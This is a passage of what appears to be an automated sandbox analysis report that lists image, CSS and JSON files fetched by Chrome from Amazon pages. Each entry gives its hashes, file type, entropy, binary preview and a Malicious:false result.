                                                                                                                                                                                                                                                                      SHA1:9FAEDE925A1E5A9070D5664FA514300BD8985D20
                                                                                                                                                                                                                                                                      SHA-256:761496BDE0DE10F16BAD65034645AF648E51F4B9F3B4CDDEFE7286E584F1A91E
                                                                                                                                                                                                                                                                      SHA-512:0EE92356702D3EAE827CEA5B912F9AFC0731F5288E66C8D649990C118530C671FBBB70CBF30348319BDBFDFA3375AFB935636B97083F425669264C382085A77F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71YanNbDe3L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......(.@.."..........6...................................................................`............6.I..KmV.z..)g.6.d...(....q...M..............cU.J..(......@.G.t..X{W7.78...G^c...Ja}YmL.=...O{.Z!..+Wr....._>....[.......A.......g.}5..I.#n..d.?j-k.a..}........!"..:B...sd.s..S...~.....X,3.wJ.T..jxw.>.z[|>.o....*..O..}.i...x.[..2...3.^..O......o.....X(......|P.....[$N.c.y.....-.m.$.f..*.r...V.}..0........+'.M....".k.mjsY,.!.,Ob4.._.,..<.2X.._($VS.#.p..",.1ja..V\...vgu.X./3.....:.?.D....Q.iH.......}...w.......}p...f.S.x!*g.;Gm...Y..6....W-....o..='.e.r.ZV..b...l._N.55.....(.......T....K.f..r.`Y.....5y./...g<`..5Ybl.....b]..(..._......*mYb....M.;..[..l..-..X[....L..U.z.=..U.l..+..v...z6.....c.I..gkx..o*.;........o..@....n.....Y.q...#.o.ni\.....9S.F....D...^Z..s..3.e.^p.{.....u.r..Y.,.eA.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):7161
                                                                                                                                                                                                                                                                      Entropy (8bit):7.876604059078097
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:G83CU0ahykjXJlDRl+ITfeOHU+vs7tz25GQshc:G83CU0a57Rlzd0Sq525GQshc
                                                                                                                                                                                                                                                                      MD5:A3A65B5CBF4F351C9634092C10A06B02
                                                                                                                                                                                                                                                                      SHA1:B1838213B7789B441947941098ADED9B2E4A7732
                                                                                                                                                                                                                                                                      SHA-256:B3D08F891C275D0BA1BCA972352022EC31E234ACFABA55E2EA1EFEA59B73F055
                                                                                                                                                                                                                                                                      SHA-512:9DA117E3E596EE102B6549EE5865B1219723D11A0C0A9664F58FB638EA9879DA724FBB5A533538E675F7AE5959C00F5AB910446FA80509D10A1E5D13D97668A9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41daFqDf-bL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`...............mo.*Sc....tz...TX..a.y...t.3..@............T..UH......t.)==>.y..+N.0|.....[Mo..,.._....P.....h...YEr...<+..}.^U.G.a.......|C.m.*R..O......|.|r...{.W.....i...u..W.[.6....6..........W.~N.....[.>z..H..0.g..I...9-..g.qIp:......yo.O....-..rS.C.....JV...z.c.>.m.c.:...].%..}9....c.[.<3_om........S.._..zc.7M3......5.Q..r.>o.w....O.9..w.O>[C@H............^O.o......?.2..n..Z../.1B.....9.;c5...]...]..O4..M9.c....J.....H.89y`......F..:yF......[ys.%QnY....)774r}t.z'V.x.Ww....'s..0.|..k5.........u../.......F...u.o.f.t...d.r.K...4..l....$L..[7.............5..S.N*<...R.m%]...=6..nl1@.....?"d.W4..FY....k[.Oo.r]z....r...................2.............................! "012@.#3AQ.$4`Baq............G.1....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5216
                                                                                                                                                                                                                                                                      Entropy (8bit):7.910288841972404
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:/aQmmjvyHK8jZImR1ejbmGlSYnljLf79vRLBVKIf02kCWrC97k4Rg:0aKq8jZ71sCuSYnlD9vRvKIf3T97k42
                                                                                                                                                                                                                                                                      MD5:629C631F53D74A20A910AF648340290B
                                                                                                                                                                                                                                                                      SHA1:AADE0E5C916EC50A3E0C4F43B4C95D9AED876887
                                                                                                                                                                                                                                                                      SHA-256:CFBF44DF29C5A0133C894401F3537455ACC07E1E40FF27004DAF10A237EB62CE
                                                                                                                                                                                                                                                                      SHA-512:A18D91FC219D97E6B7E527371A8A888F0ACC36B8F98521B8B0424113113E76FAAFDE97FFD16B0173A2BF1C4331CA24457B4EAB1AA3419C425593C44292DD649A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................%... ..#.%.%$$&)*%.)8...........#...$...+$*.$&$$./$*#$.%$. .....$.&&%..&#.2...$#) .&-......t...."..............................................................!.1.AQ.."a...2Rq.3BS..$...Cbrs....................................................!1..AQ..."#2aq.4B...3b..............?...E..+L.(..N..~=&2.Il.<.......o...."...AV.....$..|)8`....O.}i....2-.+y).......%B.&/V...X.".V...L.".)4.].K.....8;r3VN....u.....<..be<....U.......Q.YN&lB;.Y..7..i3.D>.......'s.W..c.&Y.=.Xct.#e....Y]/.]....$h.....'mr>..\..*O....I..W....o.\%'.o...U....6....i....._..9&2..6..p.-v.S .d..1.....Id.!......)...3..t...J...". .o4...m.....6....i.igo.Z.f%1.i...7.#.j.).o..|.9N.......,....u..;..Dz..'.%_.o...U....o...U...."...#...)Ea...$y.l.=^.K.E.....*..."...ekH.7;..........CI..p..v-.;.W..zb..;.W.....{kb-.<w........X.y1 ..HV|x+.\.a.........X...Q.TSH..|..)dzZ...._.T..|.e.9..3....W.M...,...i.?.k..j[X...N..20.E.mhk.V....]...)gv...Mn..E.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 132 x 235, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):13199
                                                                                                                                                                                                                                                                      Entropy (8bit):7.954935066574483
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:rH0E+WSNeZU6PNg1A0KxVaF5bXXt7qYs9lcCHihS5WC9tEAxvVy4yK+ezneiTs4Q:rHpXSJSNg1A0KxC5jUDcvuLxvQlziLI
                                                                                                                                                                                                                                                                      MD5:4AB8824103871D92816E2A084A05949B
                                                                                                                                                                                                                                                                      SHA1:85C43DB1559578D308AE8CEE328CC4483352A649
                                                                                                                                                                                                                                                                      SHA-256:958E3858A8659187AD3BC8E723E0C6A1C2415C6AE40023B40CD0289D0E2DF366
                                                                                                                                                                                                                                                                      SHA-512:A5705C4177AC542244E6BA77BEDFC19BB69823B16206A1C086A2719DB9239222B8DAA0F808B6535BFCB479D0504C63E1597594D8FC2F9AE7DB03F0AE72242DE6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...............>(....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b3e090dd-84c4-4674-9fe3-59f5a5bd6db7" xmpMM:DocumentID="xmp.did:AB1D71FA873C11E6A935C06C3689B1A4" xmpMM:InstanceID="xmp.iid:AB1D71F9873C11E6A935C06C3689B1A4" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f301801f-ea81-4562-919b-633c17b77694" stRef:documentID="adobe:docid:photoshop:9b6ca99e-cfa6-1179-9606-c490b53d51cf"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Z..k../.IDATx..}.x
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):23
                                                                                                                                                                                                                                                                      Entropy (8bit):3.914866303883101
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:YIzLKFjJ4:YI/KZJ4
                                                                                                                                                                                                                                                                      MD5:E66A7A6C91E2C26803F3F49FEB7A883F
                                                                                                                                                                                                                                                                      SHA1:4AE440FF2BD4594A3CACAEB1EDD29444B781A3ED
                                                                                                                                                                                                                                                                      SHA-256:8FD54EEE4277F1327015CC0BCAED8A878BF44D1804364CD5D93DFAB9E2D1A5AF
                                                                                                                                                                                                                                                                      SHA-512:9A00E2AA47634A1AA8B4234F7692CA71521929EE31A225A460DD5A7BD46F9196F688467B8303C5EF5D6CFF32D25B85F511BD741CE99A3FDA8D76A66591A1DC2E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:{"message":"Not Found"}
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5298
                                                                                                                                                                                                                                                                      Entropy (8bit):7.54538099097088
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:1rorvCLJujWGkVg2pFQiNk8MxPmfs/pzEvA/:1Erm3+kFQiN9MxPmfch
                                                                                                                                                                                                                                                                      MD5:9D84E6E09C1C952575ABB4CF9C7ADB4E
                                                                                                                                                                                                                                                                      SHA1:82384F82C73346576F30E549181070DA1CFF8B0F
                                                                                                                                                                                                                                                                      SHA-256:22B87B6934425E5F1668D8D00F358A1C4B527818175418D47855A362BF563092
                                                                                                                                                                                                                                                                      SHA-512:F549730726AB4BFC0D59536D7325D355E1A49404177BF379A55DF7CC9A3179ADCA5CE9E8D06ECD4C2E4F0DDEF7F99DE19ECD83E74EC515E1624EF0CD4605592C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Desktop-Indoor-sports-1500x80.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."......................................................................3a....................................N07ek.........................8.].......@'._.87w.v.D.......g........................>.....~.`......Gx.n...>.R.h.H..C.!..........l^...............Z.q.......j..5...\..I.r.....*.B.D...........x.........:..+.....-.WZt....O........j.}B.=Y........................~......................................l~.......................3........................................................5..........n...`...............*@.......................................................D....................SB.4^../ ..........'...3zl..ZE.M...................v........$...........W...*..........................2.6`.57...4p. ..........fky,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 63x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6618
                                                                                                                                                                                                                                                                      Entropy (8bit):7.935032450894638
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TyRZRMzAuFLIYKl0r5ISYdre8H+R2NV65a38z7TwLwPZbtRd36Wwuw1bR1:O3WdLWk4X429sz7+yvnwzd1
                                                                                                                                                                                                                                                                      MD5:D0FD2A84A97736D17DFC1C27766D29EE
                                                                                                                                                                                                                                                                      SHA1:1735DDABCD697BE1492DC2471F561FE846F7BC35
                                                                                                                                                                                                                                                                      SHA-256:E749AB22E5542C36172B038DB9F858D5226D1B29E97AA4F47AB97D05FD11C9E2
                                                                                                                                                                                                                                                                      SHA-512:DF4AC5C28AE9874FE377F76888CA46A66DD788DA607FE228B902EB0B4B925619BE885CEB32A609C38DE70385F9BF28BD1D16FD443D91D2821A5BE65D11E89435
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........?.."..............................................................!...."1.A.2Qa..#B$3Rbd....qr.................................................1..!"Aq.a.................?..k^..r.V.E..:..........."b....C.z.1.l.........!.-.......toKBx..@.&.E.A...:7..Vk..jQ.O,E&*.%..9.0..(. ...f..."..|...........w.....ORHD.oT(k.<.d:D5..URdOz})_.....H..Y...=L..?...!...N0.$..<s.QpV.....?..I:4.V.j...$..Q.,.I.O..!.....w...R...+.P2.......d.?=T..H..)..~...........\..$.I.wSE.."7.IVC^A.B.-*....:....8.~.>...\`..=90..0..@.H...L.......5*k..6.X.]G.......b....`y%eedP..Xe........b.;.D.iwJQg`BC;2"...../.D.*..*.N.L.......v1F.s..H=C....%z.Q+0.9......Wj.........g..\.n-7KMMN.VF...-xa..R(.).I...........w..5....M....Y..|..,+W;.)..j=..RA.....(.i..f.j..;.b\...wT..0.L..=9"...e.W)..d..|.A...t.]..2...Zr..A+..n2.b.).P_dY..@..$......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):13902
                                                                                                                                                                                                                                                                      Entropy (8bit):7.970316524541187
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:UlOnRM4heoAAgSEB7UhE+cw4Ngmcij/T+iYObkP/akvSFb2rBE7Lm116J3Y5LOK:Vq4xgx7ceTncRxOIXaZnOYJI5LOK
                                                                                                                                                                                                                                                                      MD5:A99A000575E64DF857E066B453341F09
                                                                                                                                                                                                                                                                      SHA1:B6AB15C6BFAA34A781DC92A36533514303E9C565
                                                                                                                                                                                                                                                                      SHA-256:FB5425F52617B8191B2EEFA7E287F46F8E2240D16BD3486489DC3BF6CF23158A
                                                                                                                                                                                                                                                                      SHA-512:F7C3BB2FCD0BA423F664E3F18B34F4E47B4C5CCAA9998428B7EDEDB2733B8F278F00ADF39F708FC75A06EE7DE7C9A25CFA16C0B9C69740990602717A44EDB49D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/711TibIXALL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."...............................................................!..1."A2QRa.....Bqu..#56t....3CSbr...$4Tc......U.................................................1....!Q..2AR3aq."..B..............?..t(P....(.B.$.....F....j...?...c+...8....h.;.......+.3..k[HG.I;{..*..r./.`..)]v.....H.Im.......q]..O......r....O..y....../=...........d..5.t..q...Lb....)..FS.n&..].f.L....o.....l|]m..ZF..QI...?(^-......e..:.....[#.`.Xg.s.O..2.}p..}......`._8.U...k..e.[.[.db.......7......S...@t......B..(P.@..(P.......i-..x......8.....U.a..........w.`....7.Zxz...Z..Q~!.g..e......h_>..!.Q...".[M7Dh...gP.....R....d~.S..(...u..b...jkfn.J}.........O{(..{W..5....!....4.$ x...;...F......Y..I...<p...a..h=)G.....x....VK-....i...e.g.{..V...............+...>.......J.9bxw...$."G'...}...p.I. .$s..].b....z%.G.....j.(P....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):18723
                                                                                                                                                                                                                                                                      Entropy (8bit):7.956941869354116
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:4RKHctWFrWFqkOxtiLsj4wNgnoGuPp4uM5kTei3CQZ1wovslfj38:cXtWhWFqkOesjxgq4uM5kTNCQZ1wWmjs
                                                                                                                                                                                                                                                                      MD5:34920E91509021B96CDE281737169CBD
                                                                                                                                                                                                                                                                      SHA1:8056D188363FFB95B8087E9407807645BCD9DB8C
                                                                                                                                                                                                                                                                      SHA-256:BB4098A835DE98AE838E03BD9A5137D1C826FBA01AD74EA812F44ABE41D506CC
                                                                                                                                                                                                                                                                      SHA-512:134D093DDDF58D4D4221B8E9F0C403408F54E791AD35B602CE4DABED8C5E23B8384D85522AE717895590BE8AC3DC8BF04BBD7382F78D5B23656A4C5F3B4FC906
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/711nRqFo6GL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......,.@.."..........6........................................................................Ne.......s.[G...& -...s.w..{~..|?..i=....=.0H...ZzL..az.3.....{.U..........)..|.....7..._).*#.r....z.....{..t5....,.s.St9p.....9..Z...;......e.Y7.,r9#..H........Q..0ky.........d.,.k...u_)..........]..u.6$O..G..{x,../.:..|..xL..B$Z.y.C...-.j..u.... ........JS.s.^aJ....qT.....6.d..G....j.....-...~....._=........X.....=...;/.{(./..5.........+dV..-..Y.......\.%V.m.+b...V..>.^.$Gv..dyl.s....n...]..Bh....&.....a.V...{ItW.K.4]..n.J.....^Xp.W./.e....`g.m..I..wUq...cU[...7.R....K.#.b`".:.....1.v.....?...\.V).f.u._..".f.s...x..E.-.{V_@..\..........~a.Y#...z.:.N.....U..a.Q.oo>....(k...)l....5.Nq.].V....e....v}...${V.F..k!...p.H.m.a...K5....@...s..S.D.".l... .k6.liQ_WF.f<.&..>..*..*.\..bd..2Y..*......66...s
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5865
                                                                                                                                                                                                                                                                      Entropy (8bit):7.557711722902898
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:1ryhNb3GQ23w5zgAHJ6fCLsGvwCwFyyyyyyyyyyyyyyyyyyyyyy/9vFP6DktDuIc:1+h93P236zf6fEcyyyyyyyyyyyyyyyyk
                                                                                                                                                                                                                                                                      MD5:09AC2B346659BA2CE0D8269AD2F92938
                                                                                                                                                                                                                                                                      SHA1:5A43FAFD61691108C0242E5480E877EC0F3150F1
                                                                                                                                                                                                                                                                      SHA-256:CAE79E0FFBF6664010022948D4E135918DE39DE8469FF6C379B233997D8604FF
                                                                                                                                                                                                                                                                      SHA-512:5F17207BF1000B4832B4D015ABCE35411B1D5436A561F1CA813C76D5BC2FBDAC7748716332FBF7B7BCD844982912CA2A84AB7DE732CE9DFF91DC72FEEB930CF5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."...............................................|.......................g.........................>...........<< ..X..<..............|>.........\<}.J._k..N..u_...........my....l.r"}............|>........._.:...5opS.g....GS...c...]e......Y...............3..............^\....:.C..........s.v.k...!VWb...-*.*........................_.g..*...p6.|H......._z?...M\...[;.I`1...........|............-z.....................................................................................................................R.r,@....`....t.r.:U......X.....%K..b......@....................................................................>wG.S....n7...............x.z5.g... ...........9.-=....:.....................-..........................2.`..!56.... 04p7.........."+r.J.J.J.J.J.J.J.J.J.J.J.J.J.J.J.J.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x248, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):14432
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9438494173544365
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:pmwuUGAi+fiB2XB5eww6Q/OMn4nWQWHEC8Y:QGjiwxO//OW4niHl8Y
                                                                                                                                                                                                                                                                      MD5:0D83CBCB7B53014ACFDE89E76E162A19
                                                                                                                                                                                                                                                                      SHA1:3C143C6C0DAE6EC259BF57367594A8AE85022611
                                                                                                                                                                                                                                                                      SHA-256:250866EE69D664586B1C5E9D718E5E517296363FEB0632505140AA47119DB0CA
                                                                                                                                                                                                                                                                      SHA-512:56F2E81D1BB07E807FF81836039076E51AC5ACD2AE11AE9E945CB96D79E9EECAF08BB7CC529753F1F98F40A6A7F41C14BF4CDE7AC76DA59958238BACE882E2CD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........6............................................................................f..../...7.%..iG+m...W/J...i.9_.t............~G)..+D*.v....O...o..x.f.S....~ef.+K...!g.<..g+.Q.{..J..................h....T.\..M~H..ub.KDmr"M..vo7JI........_j.X.MI.Kd....50.g........0...m..y..a=.|.nOyB........9.......vE...=2{...w.M?..z..T3.'<i.3G]...F.s.W...7.....)x.rG.Kn.W....'...bg..!.naX...0.[J..ckLh..t.j7...P...|...%(...Y.}...[...C.GwpK9.K...J.+.x..O.w<....x........g....tH..?sv.....T./>|....BdIQ;...u....q.........ex`.....6s.p.r-..;./n}..s..1=V.........~.....vf..TogQ.. ....B.GdSU...|..uO2v.,g...../E"....F.e...W.... ..e...\..8.U.....D...e.l.....O..G..._.d.g.rg0...l.v...cS...Y..e.. .......G..^)........u.Y~W?..qdJ..i.2..Z.........^..a......z.........|z*=|<..|..;.....s|.3F.G.6N/w.5.I*s..9._~g^.>....SB.........
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (13959), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):13959
                                                                                                                                                                                                                                                                      Entropy (8bit):4.858274335382957
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:XWOl3c960gt3JO2Xs61xWKAr/HXQIQKLKrs3k06RdlIxo2Eru3ra/I7xAfRgQoMv:XWwBCQYYAeu6A7ifHsQ9NXyptgYUX
                                                                                                                                                                                                                                                                      MD5:6139BD4550416E4ED64680A58EF8E43A
                                                                                                                                                                                                                                                                      SHA1:3FFF87F0A65C684ADDB1762DD91D84DC09AE2384
                                                                                                                                                                                                                                                                      SHA-256:67D41A4FFFBB712D314314AFA8DAA1D443898DE585C494FE23EB3E76073ACB4A
                                                                                                                                                                                                                                                                      SHA-512:8C4F115F856A1A43CA31FF94787F78E55168E073B878E432252E5B0A00FAE786635A02F8536E0B90C49812A7C441B3BA624F3F05ABB2FDFABE10EABC95669DE3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/31fNEss5igL.css?AUIClients/DetailPageAllOffersDisplayAssets
                                                                                                                                                                                                                                                                      Preview:#all-offers-display{overflow:visible!important;position:fixed;right:-620px;width:602px;bottom:0;z-index:290;margin:0;background-color:#f9fbfb;border-width:0;top:0;box-shadow:-4px 0 5px rgba(0,0,0,.25);-webkit-overflow-scrolling:touch;text-align:initial;font-size:13px;color:#111}#all-offers-display #aod-offer-list{background-color:#fff}#all-offers-display .aod-delivery-promise-column{margin-right:0!important}#all-offers-display .aod-delivery-promise-column .aod-unified-delivery .a-spacing-base{margin-bottom:0!important}#all-offers-display .aod-delivery-promise-column .aod-scheduled-delivery #sd_buybox_root{margin:0!important;padding:0!important}#all-offers-display .aod-delivery-promise-column .aod-scheduled-delivery #afn_content,#all-offers-display .aod-delivery-promise-column .aod-scheduled-delivery .sd_bb_centered{display:none}#all-offers-display .aod-delivery-promise-column .aod-scheduled-delivery .a-row{margin-bottom:0!important;margin-top:0!important}#all-offers-display .aod-delive
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 301x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):28273
                                                                                                                                                                                                                                                                      Entropy (8bit):7.983603601699173
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:MSRQVqGQyrc2p9ZY5QIRvVzgaTv0xfn0q1gwfM4:MStGJrc2jVIRTKn0c9P
                                                                                                                                                                                                                                                                      MD5:3285BC9307F0BBE43DB535CE44A530F7
                                                                                                                                                                                                                                                                      SHA1:6462E7A1C083E1F0CA18629068869A22FBA37B20
                                                                                                                                                                                                                                                                      SHA-256:687BE24094B64C531DEBA4E14931A74B38E2CD64256D26E4BCF87A14BBD17C0E
                                                                                                                                                                                                                                                                      SHA-512:484247DF759C4A28A3986EC89B9F14CF2D915E4B761D79AB684CDADD6B86DB5B13A58918B546158B2F62F59C0CAF1618ADA39B7E2E730C7C0CD56E3BBEDD1C3E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.-.."..........5..................................................................i!$...#..d....)....#w.RV.R,p....A...b..Kj.r l.....[&....M.y..=w^}.m.A2=.$$..B..|..p.b........'.E....ed.x..>.l.W9.0(.c. ....._.=1.........hE..q..].........#..$.. .gzO..57p\0_;...\.-c.....#....f5]b%.....(..0&L.i$(...B.Ca.y...].oR..u".X.J.bLw"....HI".K.w.D.Y^I...4f..L.I>q....}qdw;..Z.#..M....9y...yG7.).."R.t......4...$$.$.2.R.:{..........*G..8....1...._......<..9......F.7-......#..&(..LB........H.....G.]KDZQ,z./.}$u.w.W3.p9.~.b...'...W..l%.9....B..{8.Zug.M...?O..6.G....W...$$...E....PB...M...#.&...x.va&.....K-.....=..W{..9.$`8.4q.s...?.@gmw..?..)..5...Y....$..G.3.1. x2@I|..[..{g.i.L;......).#:..s76.p.I..P..k.b.z.m......F.....<=..\AHT....+.KBI.$/;...f...L..H.2.i|.......p;.,..J\.)m2.....0t:....C4.,!v..iI....B
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2700
